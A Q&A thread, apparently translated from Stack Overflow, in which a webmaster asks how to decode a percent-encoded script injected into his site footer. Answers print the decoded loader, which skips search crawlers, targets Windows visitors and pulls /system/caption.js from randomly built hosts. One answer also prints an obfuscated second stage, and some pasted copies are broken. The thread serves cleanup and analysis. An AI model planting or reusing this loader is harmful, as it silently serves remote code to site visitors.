2010-08-02 30 views

我的網站頁腳被注入了以下內容。爲了解決更大的謎題(「發生了什麼」),我試圖對其進行解碼。有任何想法嗎?如何解碼這段被注入的Javascript?

下面的代碼:

<!-- Injected footer payload exactly as pasted. It is a single line that the site wrapped after "...%54%53%"; the "74%72..." on the next line continues the same escape sequence ("%53%74%72%69%6E%67" = "String"). The only thing this outer layer does is document.write(unescape(...)): the percent-encoded string is a second <script> element, whose decoded form appears in the answers below. The <ads> wrapper is not a standard HTML element and is a handy string to search for when checking other files on the site. -->
<ads><script type="text/javascript">document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%76%61%72%20%61%3D%77%69%6E%64%6F%77%2E%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2C%62%3D%2F%28%79%61%68%6F%6F%7C%73%65%61%72%63%68%7C%6D%73%6E%62%6F%74%7C%79%61%6E%64%65%78%7C%67%6F%6F%67%6C%65%62%6F%74%7C%62%69%6E%67%7C%61%73%6B%29%2F%69%2C%63%3D%6E%61%76%69%67%61%74%6F%72%2E%61%70%70%56%65%72%73%69%6F%6E%3B%20%69%66%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%69%6E%64%65%78%4F%66%28%22%68%6F%6C%79%63%6F%6F%6B%69%65%22%29%3D%3D%2D%31%26%26%21%61%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%6D%61%74%63%68%28%62%29%26%26%63%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%77%69%6E%22%29%21%3D%2D%31%29%7B%76%61%72%20%64%3D%5B%22%6D%79%61%64%73%2E%6E%61%6D%65%22%2C%22%61%64%73%6E%65%74%2E%62%69%7A%22%2C%22%74%6F%6F%6C%62%61%72%63%6F%6D%2E%6F%72%67%22%2C%22%6D%79%62%61%72%2E%75%73%22%2C%22%66%72%65%65%61%64%2E%6E%61%6D%65%22%5D%2C%65%3D%5B%22%76%61%67%69%2E%22%2C%22%76%61%69%6E%2E%22%2C%22%76%61%6C%65%2E%22%2C%22%76%61%72%73%2E%22%2C%22%76%61%72%79%2E%22%2C%22%76%61%73%61%2E%22%2C%22%76%61%75%74%2E%22%2C%22%76%61%76%73%2E%22%2C%22%76%69%6E%79%2E%22%2C%22%76%69%6F%6C%2E%22%2C%22%76%72%6F%77%2E%22%2C%22%76%75%67%73%2E%22%2C%22%76%75%6C%6E%2E%22%5D%2C%66%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%64%2E%6C%65%6E%67%74%68%29%2C%67%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%65%2E%6C%65%6E%67%74%68%29%3B%64%74%3D%6E%65%77%20%44%61%74%65%3B%64%74%2E%73%65%74%54%69%6D%65%28%64%74%2E%67%65%74%54%69%6D%65%28%29%2B%39%30%37%32%45%34%29%3B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%22%68%6F%6C%79%63%6F%6F%6B%69%65%3D%22%2B%65%73%63%61%70%65%28%22%68%6F%6C%79%63%6F%6F%6B%69%65%22%29%2B%22%3B%65%78%70%69%72%65%73%3D%22%2B%64%74%2E%74%6F%47%4D%54%53%
74%72%69%6E%67%28%29%2B%22%3B%70%61%74%68%3D%2F%22%3B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%27%2B%65%5B%67%5D%2B%64%5B%66%5D%2B%27%2F%73%79%73%74%65%6D%2F%63%61%70%74%69%6F%6E%2E%6A%73%22%3E%3C%5C%2F%73%63%72%69%70%74%3E%27%29%7D%3B%3C%2F%73%63%72%69%70%74%3E'));</script></ads>

我感謝所有的答案。我已經把它清理乾淨了,並會繼續關注更多。 – 2010-08-05 03:24:23

回答

6

可以使用this tool對字符串進行解碼:將字符串轉換選項設置爲URL解碼。然後你可以用js beautifier整理格式。

因爲我很好奇,我看了一下輸出。它會從一個半隨機的域名向您的頁面寫入一個新的caption.js腳本。有2個用於拼接完整域名的URL片段數組,所以我會說你有些事情要處理了。


謝謝您的參考和仔細觀察!我很感激! – 2010-08-05 03:23:53

1

所有這些數字都是ASCII字符的十六進制值。當unescape被調用時,它們變成真正的字符。例如%3C是'<'。

爲什麼不用一個消息框來顯示unescape(...)的結果呢?

6
<script language="javascript" type="text/javascript">
// Decoded first stage of the injected footer script. This is only a loader: it decides
// whether to fetch a second script and from which host.
// a: the browser's user-agent; b: crawler names to exclude; c: navigator.appVersion.
var a = window.navigator.userAgent,
    b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,
    c = navigator.appVersion;
// Gate: no "holycookie" marker yet (so each browser is hit once per cookie lifetime), the
// user-agent is not one of the listed crawlers (presumably so search-engine scanners never
// see the payload -- inference), and appVersion contains "win", i.e. a Windows client.
if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) {
    // d: second-level domains, e: subdomain prefixes. One of each is chosen at random, so
    // the payload host is one of 13 x 5 = 65 combinations; blocking a single host is not enough.
    var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"],
     e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."],
     f = Math.floor(Math.random() * d.length),
     g = Math.floor(Math.random() * e.length);
    // dt is never declared with var, so it leaks as an implicit global.
    dt = new Date;
    // 9072E4 ms = 90,720,000 ms = 25.2 hours: the marker cookie suppresses re-execution for about a day.
    dt.setTime(dt.getTime() + 9072E4);
    document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/";
    // Second stage: writes <script src="http://<prefix><domain>/system/caption.js"> into the page.
    // "<\/script>" is escaped so the string literal does not terminate the enclosing <script>.
    // Useful indicators when grepping a site's files: "holycookie", "/system/caption.js", "unescape(".
    document.write('<script type="text/javascript" src="http://' + e[g] + d[f] + '/system/caption.js"><\/script>')
};
</script>

也就是說,它把 e 中的一個元素(如 vagi.)作爲子域名前綴,拼接到 d 中的一個域名(如 myads.name)前面,然後從該域名加載 /system/caption.js(例如 http://vagi.myads.name/system/caption.js)。


謝謝你的代碼示例和解釋。 – 2010-08-05 03:23:25

1

你可以使用這裏的十六進制解碼器: http://home2.paulschou.net/tools/xlate/ 。解碼出的代碼是

<!-- Decoded loader, on one line as the decoder produced it. On Windows browsers that lack the "holycookie" marker and whose user-agent is not one of the listed crawlers, it sets the marker cookie (expiry +9072E4 ms, about 25.2 hours) and document.write()s a second <script> whose src is http://<one of 13 prefixes><one of 5 domains>/system/caption.js. -->
<script language="javascript" type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};</script>
1
<script language="javascript" type="text/javascript">
// Same decoded loader, lightly reformatted. a = user-agent, b = crawler names to skip, c = appVersion.
var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion;
// Only fires once per cookie lifetime, never for the listed crawlers, and only on "win" clients.
if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){
    // d: domains, e: subdomain prefixes; f and g pick one of each at random (65 possible hosts).
    var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],
    e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],
f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);
// dt is an implicit global (no var); 9072E4 ms is about 25.2 hours.
dt=new Date;
dt.setTime(dt.getTime()+9072E4);
// NOTE: the next three lines are one statement in the original (see the other answers); the
// string literal was wrapped when this answer was formatted, so as pasted here it would not parse.
document.cookie="holycookie="+escape("holycookie")+";
expires="+dt.toGMTString()+";
path=/";
// Second stage: injects <script src="http://<e[g]><d[f]>/system/caption.js">; "<\/script>" keeps
// the literal from closing the enclosing <script> element.
document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};
</script>
1

這裏有一個URLDecoder: http://meyerweb.com/eric/tools/dencoder/

解碼後的代碼爲:

<!-- Decoded loader (single line). Conditions: no "holycookie" cookie, user-agent not a listed crawler, appVersion contains "win". Effect: sets the marker cookie for 9072E4 ms (about 25.2 hours) and writes a <script> tag that loads /system/caption.js from a host assembled from one random prefix in e and one random domain in d. -->
<script language="javascript" type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};</script>

好吧,這本身沒有太多信息。它似乎會在用戶沒有名爲「holycookie」的cookie、且訪問者不是谷歌機器人時,插入另一個JS文件。其餘大部分只是用來決定從哪個域名獲取有效載荷的雜碎代碼。

2
// Decoded loader. a: user-agent string; b: crawler names that must NOT match; c: navigator.appVersion.
var a = window.navigator.userAgent,
    b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,
    c = navigator.appVersion;
// Runs once per "holycookie" lifetime, skips the listed crawlers, and targets "win" clients only.
if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) {
    // d: second-level domains, e: subdomain prefixes; f/g select one of each at random.
    var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"],
     e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."],
     f = Math.floor(Math.random() * d.length),
     g = Math.floor(Math.random() * e.length);
    // dt has no var, so it becomes an implicit global. 9072E4 ms = 25.2 hours.
    dt = new Date;
    dt.setTime(dt.getTime() + 9072E4);
    document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/";
    // Writes <script src="http://<e[g]><d[f]>/system/caption.js"> into the page; the escaped
    // "<\/script>" prevents the literal from closing the surrounding <script> element.
    document.write('<script type="text/javascript" src="http://' + e[g] + d[f] + '/system/caption.js"><\/script>')
};

這段代碼會從一個隨機的「子域名 + 二級域名(SLD)」組合加載不安全的內容。

1

您發佈的代碼解碼後爲:


// Decoded loader as posted in this answer. a: user-agent; b: crawler names to exclude; c: appVersion.
var a = window.navigator.userAgent,
    b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,
    c = navigator.appVersion;
// Fires only without the "holycookie" marker, not for the listed crawlers, and only on "win" clients.
if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) {
    // d: domains, e: subdomain prefixes; f and g choose one of each at random.
    var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"],
     e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."],
     f = Math.floor(Math.random() * d.length),
     g = Math.floor(Math.random() * e.length);
    // dt is an implicit global; the cookie lives 9072E4 ms (about 25.2 hours).
    dt = new Date;
    dt.setTime(dt.getTime() + 9072E4);
    document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/";
    // NOTE: in the other answers this call writes a <script src="http://<e[g]><d[f]>/system/caption.js">
    // tag; the argument appears to have been stripped when this answer was posted (inference).
    document.write('')
};

如果條件滿足,它會再從一個以僞隨機方式拼接出的URL加載所提供的代碼。

如果您打開了,例如http://vain.adsnet.biz/system/caption.js,您將看到以下javascript代碼。

解釋留給你自己,不過它看起來相當無害。


// Second-stage script as fetched from one of the loader's hosts. Almost every line is filler:
// the vars below are assigned once and never read, and the assignments without var (zB, vD,
// fU, dL, cQ, zN, jIZ, zG, mJ, aW, bQ, fO, wU, hZ) create implicit globals. The only real
// work is in g (line building "setTimeout") and the c[g](...) call near the end.
// NOTE: "harmless" holds only for what is visible here; a server can return different content
// per request, so a snapshot of one fetch says nothing about what other visitors received.
function tT() {};
var yWP = new Array();
tT.prototype = {
    h: function() {
     this.i = "";
     var nH = function() {};
     var tE = 30295;
     var u = "";
     zB = false;
     this.a = '';
     this.eY = 29407;
     var z = document;
     vD = "vD";
     var gT = "gT";
     var oG = '';
     var lF = '';
     fU = "fU";
     var q = function() {
      return 'q'
     };
     // c aliases window, so c[g] below is a property lookup on window.
     var c = window;
     var m = function() {
      return 'm'
     };
     var kS = "kS";
     this.b = "";
     this.p = 29430;
     // j captures this so the closure passed to the timer can call h() again.
     var j = this;
     dL = "";
     var cC = new Date();
     cQ = 33459;
     var uY = "uY";
     var vO = function() {};
     zN = "zN";
     jIZ = '';
     var mH = 21601;
     // lP is just String.prototype.replace under another name; it is used to strip the
     // filler characters out of the obfuscated string pieces below.
     String.prototype.lP = function (v, hF) {
      var t = this;
      return t.replace(v, hF)
     };
     var nA = "";
     this.xK = 48622;
     zG = "";
     var kF = function() {};

     function aF() {};
     var mI = function() {};
     var oY = '';
     // g === "setTimeout": 'sfe?tfTw' minus [wfoj?] -> "setT", 'irmkeko(' minus [(rO[k] -> "imeo",
     // 'ubty' minus [y+b>)] -> "ut".
     var g = 'sfe?tfTw'.lP(/[wfoj\?]/g, '') + 'irmkeko('.lP(/[\(rO\[k]/g, '') + 'ubty'.lP(/[y\+b\>\)]/g, '');
     var iN = new Array();
     mJ = "mJ";
     aW = "aW";
     var hU = "hU";
     this.kC = 28044;
     // NOTE: this line is garbled as pasted (the second lP(...) call is cut short and its
     // parentheses do not balance), so the intended value of k cannot be recovered from here;
     // k is not referenced anywhere else in the visible code.
     var k = 'tbr3e*c(r*e3a('.lP(/[\(3b\*G]/g, '') + 'tEe>nat>gaeat)'.lP(/[\)a\>\]\|'.lP(/[\|\)\(MN]/g, ''));
     var cJ = function() {};
     var tX = false;
     this.xHX = false;

     function jP() {};
     var eZ = 16039;
     bQ = "bQ";
     var eSM = new Date();
     // window.setTimeout(function(){ j.h() }, 384): h() re-schedules itself every 384 ms, so
     // the visible code does nothing except keep a timer loop alive.
     c[g](function() {
      j.h()
     }, 384);
     this.xR = "";
     var jB = function() {
      return 'jB'
     };
     var fP = function() {
      return 'fP'
     };
     var bX = new Array();
    }
    // NOTE: as pasted, h's function body closes on the line above and these statements sit
    // directly inside the object literal, which is a syntax error; the copy on this page is
    // most likely truncated or reflowed and would not run as shown (inference).
    function iLD() {};
    var mQ = function() {};
    var wZV = "";this.eK = 5506;
}
};
fO = 30941;
// Entry point: instantiate tT and call h() once; the setTimeout inside keeps it going.
var hW = new tT();
wU = 40956;
hW.h();
hZ = "hZ";

你自己怎麼做到這一步?URLDecode + jsbeautifier 或 jsunpack 對這一步來說綽綽有餘 ;)

0

使用PHP函數rawurldecode解碼後得到:

<script language="javascript" type="text/javascript">
    // Decoded loader (output of rawurldecode). a: user-agent, b: crawler names to skip, c: appVersion.
    var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion;
    // Runs only without the "holycookie" marker, not for the listed crawlers, and only on "win" clients.
    if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){
    // d: domains, e: subdomain prefixes; f/g pick one of each at random (13 x 5 = 65 hosts).
    var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);
    // dt is an implicit global (no var); 9072E4 ms = 25.2 hours of cookie lifetime.
    dt=new Date;
    dt.setTime(dt.getTime()+9072E4);
    document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/";
    // Injects <script src="http://<e[g]><d[f]>/system/caption.js">; "<\/script>" is escaped so the
    // literal does not terminate the enclosing <script> element.
    document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};
    </script>
1

使用「版本控制」,這樣以後就不會再發生這種事。在構建完成、一切都符合要求之後,把它離線保存到外部硬盤上。

你最近有沒有做過什麼惹惱了某位程序員同事的事?